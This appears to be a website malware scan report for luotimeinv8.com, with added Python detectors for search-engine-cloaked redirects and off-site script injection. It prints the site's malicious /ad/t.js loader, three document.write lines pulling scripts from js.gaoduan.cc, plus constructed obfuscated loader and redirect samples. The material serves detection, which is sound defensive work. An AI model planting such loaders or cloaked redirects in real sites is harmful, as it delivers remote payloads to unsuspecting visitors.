Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=luotimeinv8.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: elianeelias.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Mar 2015 05:23:20 GMT
Server: Apache/2.2.29 (Unix) FrontPage/5.0.2.2635
Content-Type: text/html; charset=UTF-8
X-Pingback: http://elianeelias.com/coda/xmlrpc.php
X-Powered-By: PHP/5.3.29-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: elianeelias.com
Referer: http://www.google.com/search?q=elianeelias.com
Result:
The response matches the first query; no suspicious redirect was found.
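The check above fetches the front page twice, once with no Referer and once claiming to arrive from a Google search, and compares the two responses: a compromised site often serves the real page to a direct visitor and redirects only search-engine traffic, so the owner never sees it. The following is an added example of that comparison, written for this page and not the scanner's own code. It reads the redirect target out of a 3xx Location header, a meta refresh or a `location=` assignment in the body, and flags the case where only the search-engine visit is sent to another host. The `fetch()` helper, the `Response` class, the sample responses and the hosts `victim.example` and `bad.example` are assumptions; the clean pair only mirrors the two 200 replies shown above.

```python
"""Detect a Referer-conditional ("cloaked") redirect by comparing a plain visit
with a visit that claims to come from a Google search, as in the check above.
Hypothetical helper written for this page; not the scanner's own code."""
import re
import urllib.error
import urllib.request
from dataclasses import dataclass, field
from typing import Dict, Optional
from urllib.parse import urlparse

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


@dataclass
class Response:
    status: int
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow 3xx so the Location header stays visible to the caller."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(url: str, referer: Optional[str] = None, timeout: float = 10) -> Response:
    """Live fetch (needs network; the offline samples below never call it)."""
    hdrs = {"User-Agent": "Mozilla/5.0"}
    if referer:
        hdrs["Referer"] = referer
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(urllib.request.Request(url, headers=hdrs), timeout=timeout) as r:
            return Response(r.status, dict(r.headers), r.read(65536).decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:  # an unfollowed 3xx arrives here
        return Response(e.code, dict(e.headers), "")


def redirect_target(resp: Response) -> Optional[str]:
    """Where the response sends the visitor: Location header, meta refresh or JS."""
    if resp.status in REDIRECT_STATUSES:
        return resp.headers.get("Location")
    m = re.search(r'<meta[^>]*http-equiv=["\']?refresh["\']?[^>]*url=([^"\'>\s]+)', resp.body, re.I)
    if m:
        return m.group(1)
    m = re.search(r'(?:window|document|top|self)\.location(?:\.href)?\s*=\s*["\']([^"\']+)["\']',
                  resp.body, re.I)
    return m.group(1) if m else None


def same_site(target: str, site_host: str) -> bool:
    """Relative URLs and the site's own host (with or without www.) count as on-site."""
    host = urlparse(target).hostname
    if host is None:
        return True
    site = site_host.lower()
    if site.startswith("www."):
        site = site[4:]
    host = host.lower()
    return host == site or host.endswith("." + site)


def check_conditional_redirect(plain: Response, referred: Response, site_host: str) -> dict:
    """Flag a redirect that only appears when the request carries a search-engine Referer."""
    plain_to, referred_to = redirect_target(plain), redirect_target(referred)
    finding = {"plain": plain_to, "referred": referred_to, "suspicious": False, "reason": ""}
    if referred_to and referred_to != plain_to and not same_site(referred_to, site_host):
        finding["suspicious"] = True
        finding["reason"] = f"search-engine visitors are sent off-site to {referred_to}"
    elif referred_to and referred_to != plain_to:
        finding["reason"] = "Referer-dependent redirect, but it stays on the site"
    else:
        finding["reason"] = "redirect behaviour does not depend on the Referer"
    return finding


# Constructed samples: the clean pair mirrors the elianeelias.com replies above
# (200 both ways); the hijacked pairs are invented to show the positive case.
CLEAN_PLAIN = Response(200, {"Server": "Apache/2.2.29 (Unix) FrontPage/5.0.2.2635",
                             "Content-Type": "text/html; charset=UTF-8"}, "<html><body>site</body></html>")
CLEAN_REFERRED = Response(200, dict(CLEAN_PLAIN.headers), CLEAN_PLAIN.body)
HIJACKED_PLAIN = Response(200, {"Content-Type": "text/html"}, "<html><body>site</body></html>")
HIJACKED_302 = Response(302, {"Location": "http://bad.example/landing"}, "")
HIJACKED_JS = Response(200, {"Content-Type": "text/html"},
                       "<script>window.location='http://bad.example/x';</script>")

if __name__ == "__main__":
    print(check_conditional_redirect(CLEAN_PLAIN, CLEAN_REFERRED, "elianeelias.com"))
    print(check_conditional_redirect(HIJACKED_PLAIN, HIJACKED_302, "victim.example"))
    print(check_conditional_redirect(HIJACKED_PLAIN, HIJACKED_JS, "victim.example"))
```

A Referer alone is not always the trigger: injected redirect code frequently keys on the User-Agent (mobile browsers, crawlers) or on a first-visit cookie as well, so a scanner that wants to reproduce the report's "visit from search engine" check reliably varies those headers too and compares every pair of responses the same way.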
Scanned pages/files
Request | Server response | Status |
http://www.luotimeinv8.com/ | 200 OK Content-Length: 17036 Content-Type: text/html | clean |
http://www.luotimeinv8.com/ad/ad.js | 200 OK Content-Length: 4704 Content-Type: application/x-javascript | clean |
http://s13.cnzz.com/stat.php?id=5684704&web_id=5684704 | 200 OK Content-Length: 9322 Content-Type: application/javascript | clean |
http://www.luotimeinv8.com/ad/t.js | 200 OK Content-Length: 292 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below):
document.write('<script src="http://js.gaoduan.cc/page/?s=775"></script>');
document.write('<script src="http://js.gaoduan.cc/page/?s=774"></script>');
document.write('<script src="http://js.gaoduan.cc/page/?s=1051"></script>');
Antivirus reports:
http://www.luotimeinv8.com/a/rosi/ | 200 OK Content-Length: 15372 Content-Type: text/html | clean |
http://www.luotimeinv8.com/a/xiuren/ | 200 OK Content-Length: 14380 Content-Type: text/html | clean |
http://www.luotimeinv8.com/a/tuigirl/ | 200 OK Content-Length: 12907 Content-Type: text/html | clean |
http://www.luotimeinv8.com/a/ugirls/ | 200 OK Content-Length: 12689 Content-Type: text/html | clean |
http://www.luotimeinv8.com/a/baorumeinv/ | 200 OK Content-Length: 12440 Content-Type: text/html | clean |
http://www.luotimeinv8.com/a/mm/ | 200 OK Content-Length: 11891 Content-Type: text/html | clean |
http://www.luotimeinv8.com/ad/rand1.html | 200 OK Content-Length: 17036 Content-Type: text/html | clean |
http://www.luotimeinv8.com/ad/rand.html | 200 OK Content-Length: 945 Content-Type: text/html (full response headers: Cache-Control: no-cache,max-age=2592000; Date: Wed, 27 Aug 2014 16:24:27 GMT; Accept-Ranges: bytes; ETag: "02fec116fbfcf1:0"; Server: Apache/2.23 (Linux/SUSE); Last-Modified: Sun, 24 Aug 2014 07:43:18 GMT; Set-Cookie: safedog-flow-item=9452DEDB9166FD98EE1C2E2D48109716; expires=Sat, 3-Oct-2150 17:57:43 GMT; domain=luotimeinv8.com; path=/) | malicious |
http://www.147rentiyishu.net/ | 200 OK Content-Length: 27612 Content-Type: text/html | clean |
http://www.147rentiyishu.net/ad/ad.js | 200 OK Content-Length: 2676 Content-Type: application/x-javascript | clean |
http://s23.cnzz.com/stat.php?id=1252913640&web_id=1252913640 | 200 OK Content-Length: 9325 Content-Type: application/javascript | clean |
http://www.luotimeinv8.com/test404page.js | 200 OK Content-Length: 17036 Content-Type: text/html | clean |
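The t.js finding above is the classic loader pattern: a 292-byte script that does nothing but document.write() further <script> tags pointing at a domain the site does not own, so the payload can be swapped server-side without touching the compromised host again. The following is an added example, written for this page and not the scanner's own code, of pulling those injected URLs out of a JavaScript file and flagging the ones that load from a host other than the scanned site. It goes a little beyond the page's sample by also reassembling the split-string ('<scr' + 'ipt') and hex-escape (\x3c) variants of the same trick. The three `T_JS` lines are copied from the table; `OBFUSCATED`, `ONSITE` and the host `cdn.example` are constructed.

```python
"""Extract the script URLs a JavaScript file injects through document.write() and
flag those that load from another host, the pattern seen in /ad/t.js above.
Hypothetical helper written for this page; not the scanner's own code."""
import re
from typing import List
from urllib.parse import urlparse

STRING_LIT = re.compile(r'(["\'])((?:\\.|(?!\1).)*?)\1', re.S)
SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)


def unescape(s: str) -> str:
    """Undo \\xHH, \\uHHHH and \\" style escapes that hide '<script' from naive greps."""
    s = re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)
    s = re.sub(r'\\u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r'\\(["\'\\/])', r'\1', s)


def _paren_body(js: str, i: int) -> str:
    """Text between the '(' at js[i] and its matching ')', ignoring parens inside strings."""
    depth, quote, j = 0, None, i
    while j < len(js):
        c = js[j]
        if quote:
            if c == "\\":
                j += 1          # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "\"'":
            quote = c
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return js[i + 1:j]
        j += 1
    return js[i + 1:]


def written_html(js: str) -> List[str]:
    """Reconstruct what each document.write()/writeln() emits, joining 'a' + 'b' pieces."""
    out = []
    for m in re.finditer(r'document\.write(?:ln)?\s*\(', js, re.I):
        arg = _paren_body(js, m.end() - 1)
        pieces = [unescape(body) for _quote, body in STRING_LIT.findall(arg)]
        if pieces:
            out.append("".join(pieces))
    return out


def injected_scripts(js: str) -> List[str]:
    """src attribute of every <script> tag the file writes into the page, in order."""
    return [src for html in written_html(js) for src in SCRIPT_SRC.findall(html)]


def offsite_injections(js: str, site_host: str) -> List[dict]:
    """One finding per injected script; offsite=True when it loads from a foreign host."""
    site = site_host.lower()
    if site.startswith("www."):
        site = site[4:]
    findings = []
    for src in injected_scripts(js):
        host = (urlparse(src).hostname or "").lower()   # "" for a relative URL
        offsite = bool(host) and host != site and not host.endswith("." + site)
        findings.append({"src": src, "host": host or site, "offsite": offsite})
    return findings


# The three lines the scanner reported in /ad/t.js (copied from the table above).
T_JS = (
    "document.write('<script src=\"http://js.gaoduan.cc/page/?s=775\"></script>');"
    "document.write('<script src=\"http://js.gaoduan.cc/page/?s=774\"></script>');"
    "document.write('<script src=\"http://js.gaoduan.cc/page/?s=1051\"></script>');"
)
# Constructed: the same trick with split strings and hex escapes; cdn.example is made up.
OBFUSCATED = r"""document.write('\x3cscr' + 'ipt src="//cdn.example/loader.js"\x3e\x3c/script\x3e');"""
# Constructed: a write that stays on the site, like the /ad/ad.js entry in the table.
ONSITE = "document.write('<script src=\"/ad/ad.js\"></script>');"

if __name__ == "__main__":
    for sample in (T_JS, OBFUSCATED, ONSITE):
        for finding in offsite_injections(sample, "www.luotimeinv8.com"):
            print(finding)
```

An off-site src is a lead, not a verdict: legitimate pages write analytics and ad tags the same way (the cnzz.com stat.php entries in the table are an example), so the host list from this helper is what gets checked against a blocklist or the site owner's known third parties, which is exactly the step the antivirus column in the report represents.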